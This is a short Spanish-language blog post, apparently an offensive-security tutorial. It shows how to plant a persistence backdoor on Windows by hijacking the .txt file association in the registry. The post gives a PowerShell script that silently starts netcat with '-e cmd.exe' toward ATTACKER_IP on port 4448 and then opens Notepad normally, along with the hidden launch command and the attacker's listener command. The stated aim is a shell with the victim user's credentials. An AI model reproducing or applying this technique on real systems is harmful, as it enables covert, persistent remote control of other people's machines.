Persistencia con Backdoor mediante la ejecución cualquier archivo .txt en Windows

Lo que vamos a hacer hoy es crear un Backdoor de persistencia para que cuando el usuario ejecute cualquier archivo con extensión .txt

Primeramente nos vamos a Regedit en la maquina victima y buscamos el siguiente registro.


Un ProgID es simplemente un identificador de un programa instalado en el sistema.

Luego tenemos que ir el ProgID que esta en la misma ruta del carpeta "Classes" que es la que estamos ahora.


En este caso, al intentar abrir un archivo .txt, el sistema ejecutará. %SystemRoot%\system32\NOTEPAD.EXE %1, donde %1 representa el nombre del archivo abierto. Si queremos secuestrar esta extensión, podríamos sustituir el comando por un script que ejecute un backdoor y luego abra el archivo como de costumbre. Primero, creemos un script ps1 con el siguiente contenido y guardémoslo en C:\Windows\backdoor.ps1:
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]

Observe cómo en Powershell, tenemos que pasar $args[0] al bloc de notas, ya que contendrá el nombre del archivo que se abrirá, como se indica a través de %1.

powershell -windowstyle hidden C:\windows\backdoor.ps1

Ahora simplemente cada vez que el usuario ejecute un archivo con extensión .txt nos dará un backdoor con las credenciales del usuario que ejecuto el archivo .txt

Nos ponemos en escucha atreves de netcat con el comando 

nc -lvpn 4448

Abrimos un archivo txt en la maquina victima y obtenemos la shell.



Comentarios

Entradas populares